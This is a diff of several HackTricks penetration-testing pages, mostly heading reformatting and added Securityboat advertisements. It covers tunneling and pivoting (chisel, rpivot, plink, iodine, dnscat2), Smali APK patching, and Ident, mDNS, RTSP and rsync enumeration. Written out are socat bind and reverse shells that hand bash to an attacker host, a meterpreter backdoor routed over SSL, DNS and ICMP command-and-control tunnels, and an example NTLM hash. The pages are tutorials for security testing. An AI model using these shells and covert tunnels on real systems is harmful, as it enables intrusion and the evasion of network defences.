#And now you can use proxychains with port 1080 (default) #And now you can use proxychains with port 1080 (default)
``` ```
## Port forwarding ### Port forwarding
```bash ```bash
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
``` ```
# Rpivot ## Rpivot
[https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot) [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
Reverse tunnel. The tunnel is started from the victim. Reverse tunnel. The tunnel is started from the victim.\
A socks4 proxy is created on 127.0.0.1:1080 A socks4 proxy is created on 127.0.0.1:1080
```bash ```bash
@ -181,37 +187,37 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45 victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
``` ```
# **Socat** ## **Socat**
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
## Bind shell ### Bind shell
```bash ```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337 attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
``` ```
## Reverse shell ### Reverse shell
```bash ```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
``` ```
## Port2Port ### Port2Port
```bash ```bash
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> & socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
``` ```
## Port2Port through socks ### Port2Port through socks
```bash ```bash
socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
``` ```
## Meterpreter through SSL Socat ### Meterpreter through SSL Socat
```bash ```bash
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that port #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
@ -231,7 +237,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke
[https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/) [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/)
## SSL Socat Tunnel ### SSL Socat Tunnel
**/bin/sh console** **/bin/sh console**
@ -251,9 +257,9 @@ attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=cli
victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
``` ```
## Remote Port2Port ### Remote Port2Port
Connect the local SSH port \(22\) to the 443 port of the attacker host Connect the local SSH port (22) to the 443 port of the attacker host
```bash ```bash
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
@ -261,9 +267,9 @@ victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Esta
attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim
``` ```
# Plink.exe ## Plink.exe
It's like a console PuTTY version \( the options are very similar to a ssh client\). It's like a console PuTTY version ( the options are very similar to a ssh client).
As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine: As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine:
@ -272,23 +278,23 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
``` ```
# NTLM proxy bypass ## NTLM proxy bypass
The previously mentioned tool: **Rpivot** The previously mentioned tool: **Rpivot**\
**OpenVPN** can also bypass it, setting these options in the configuration file: **OpenVPN** can also bypass it, setting these options in the configuration file:
```bash ```bash
http-proxy <proxy_ip> 8080 <file_with_creds> ntlm http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
``` ```
## Cntlm ### Cntlm
[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/) [http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net)
It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port. It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\
Example that forward port 443 Example that forward port 443
```text ```
Username Alice Username Alice
Password P@ssw0rd Password P@ssw0rd
Domain CONTOSO.COM Domain CONTOSO.COM
@ -296,22 +302,22 @@ Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443 Tunnel 2222:<attackers_machine>:443
``` ```
Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222. Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\
You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222. You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
# YARP ## YARP
A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy) A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
# DNS Tunneling ## DNS Tunneling
## Iodine ### Iodine
[https://code.kryo.se/iodine/](https://code.kryo.se/iodine/) [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries. Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries.
```text ```
attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
victim> iodine -f -P P@ssw0rd tunneldomain.com -r victim> iodine -f -P P@ssw0rd tunneldomain.com -r
#You can see the victim at 1.1.1.2 #You can see the victim at 1.1.1.2
@ -319,13 +325,13 @@ victim> iodine -f -P P@ssw0rd tunneldomain.com -r
The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using: The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using:
```text ```
ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
``` ```
## DNSCat2 ### DNSCat2
Establishes a C&C channel through DNS. It doesn't need root privileges. Establishes a C\&C channel through DNS. It doesn't need root privileges.
```bash ```bash
attacker> ruby ./dnscat2.rb tunneldomain.com attacker> ruby ./dnscat2.rb tunneldomain.com
@ -339,19 +345,19 @@ session -i <sessions_id>
listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
``` ```
### Change proxychains DNS #### Change proxychains DNS
Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** \(hardcoded\). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
# Tunnels in Go ## Tunnels in Go
[https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel) [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
# ICMP Tunneling ## ICMP Tunneling
## Hans ### Hans
[https://github.com/friedrich/hans](https://github.com/friedrich/hans) [https://github.com/friedrich/hans](https://github.com/friedrich/hans)\
[https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel) [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests. Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests.
@ -362,13 +368,18 @@ Root is needed in both systems to create tun adapters and tunnels data between t
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
``` ```
# Other tools to check ## Other tools to check
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) * [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -385,5 +396,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Smali - Decompiling/\[Modifying]/Compiling
<details> <details>
@ -16,16 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it. Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.
**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) **Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
# Fast Way ## Fast Way
Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command. Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command.
# Decompile the APK ## Decompile the APK
Using APKTool you can access to the **smali code and resources**: Using APKTool you can access to the **smali code and resources**:
@ -43,7 +51,7 @@ Some **interesting files you should look are**:
If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources). If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources).
# Change smali code ## Change smali code
You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\ You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\
Some **examples** can be found here: Some **examples** can be found here:
@ -53,7 +61,7 @@ Some **examples** can be found here:
Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali). Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali).
# Recompile the APK ## Recompile the APK
After modifying the code you can **recompile** the code using: After modifying the code you can **recompile** the code using:
@ -65,7 +73,7 @@ It will **compile** the new APK **inside** the _**dist**_ folder.
If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)
## **Sing the new APK** ### **Sing the new APK**
Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly): Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly):
@ -79,7 +87,7 @@ Finally, **sign** the new APK:
jarsigner -keystore key.jks path/to/dist/* <your-alias> jarsigner -keystore key.jks path/to/dist/* <your-alias>
``` ```
## Optimize new application ### Optimize new application
**zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign). **zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign).
@ -88,15 +96,15 @@ zipalign [-f] [-v] <alignment> infile.apk outfile.apk
zipalign -v 4 infile.apk zipalign -v 4 infile.apk
``` ```
## **Sign the new APK (again?)** ### **Sign the new APK (again?)**
If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). If you **prefer** to use \[**apksigner**]\([**https://developer.android.com/studio/command-line/apksigner**](https://developer.android.com/studio/command-line/apksigner))\*\* instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling\*\*. BUT NOTICE THAT\*\* YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling).
```bash ```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk apksigner sign --ks key.jks ./dist/mycompiled.apk
``` ```
# Modifying Smali ## Modifying Smali
For the following Hello World Java code: For the following Hello World Java code:
@ -120,9 +128,9 @@ The Smali code would be:
The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
## Light Changes ### Light Changes
## Modify initial values of a variable inside a function ### Modify initial values of a variable inside a function
Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones: Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones:
@ -134,7 +142,7 @@ const/4 v8, 0x1
const-string v5, "wins" const-string v5, "wins"
``` ```
## Basic Operations ### Basic Operations
``` ```
#Math #Math
@ -159,9 +167,9 @@ if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6
goto :goto_6 #Always go to: :goto_6 goto :goto_6 #Always go to: :goto_6
``` ```
## Bigger Changes ### Bigger Changes
## Logging ### Logging
``` ```
#Log win: <number> #Log win: <number>
@ -180,7 +188,7 @@ Recommendations:
* The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0). * The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0).
* Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_. * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_.
## Toasting ### Toasting
Remember to add 3 to the number of _.locals_ at the begging of the function. Remember to add 3 to the number of _.locals_ at the begging of the function.
@ -198,6 +206,12 @@ move-result-object v12
invoke-virtual {v12}, Landroid/widget/Toast;->show()V invoke-virtual {v12}, Landroid/widget/Toast;->show()V
``` ```
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -214,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# 113 - Pentesting Ident
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Basic Information {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection. ## Basic Information
Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection.
**Default port:** 113 **Default port:** 113
@ -28,9 +34,9 @@ PORT STATE SERVICE
113/tcp open ident 113/tcp open ident
``` ```
# **Enumeration** ## **Enumeration**
## **Manual - Get user/Identify the service** ### **Manual - Get user/Identify the service**
If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing: If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:
@ -44,7 +50,7 @@ Other errors:
![](<../.gitbook/assets/image (17).png>) ![](<../.gitbook/assets/image (17).png>)
## Nmap ### Nmap
By default (-sC) nmap will identify every user of every running port: By default (-sC) nmap will identify every user of every running port:
@ -63,7 +69,7 @@ PORT STATE SERVICE VERSION
|_auth-owners: root |_auth-owners: root
``` ```
## Ident-user-enum ### Ident-user-enum
Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`.
@ -77,15 +83,15 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.1.100:445 root 192.168.1.100:445 root
``` ```
## Shodan ### Shodan
* `oident` * `oident`
# Files ## Files
identd.conf identd.conf
# HackTricks Automatic Commands ## HackTricks Automatic Commands
``` ```
Protocol_Name: Ident #Protocol Abbreviation if there is one. Protocol_Name: Ident #Protocol Abbreviation if there is one.
@ -106,6 +112,12 @@ Entry_2:
Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports)
``` ```
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -122,5 +134,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Docker Basics ## Docker Basics
### What is ### What is
@ -349,6 +356,13 @@ falco-probe found and loaded in dkms
You can use auditd to monitor docker. You can use auditd to monitor docker.
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Basic Information
Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isnt dependent on it. Theyre both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\ Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isnt dependent on it. Theyre both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\
@ -106,6 +113,13 @@ For more information check:
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y) * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Basic Information
> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). > The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording).
@ -98,8 +105,14 @@ Cameradar allows you to:
* Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content * Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content
* Try to create a Gstreamer pipeline to check if they are properly encoded * Try to create a Gstreamer pipeline to check if they are properly encoded
* Print a summary of all the informations Cameradar could get * Print a summary of all the informations Cameradar could get
* [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
[https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) {% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## **Basic Information** ## **Basic Information**
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. > **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
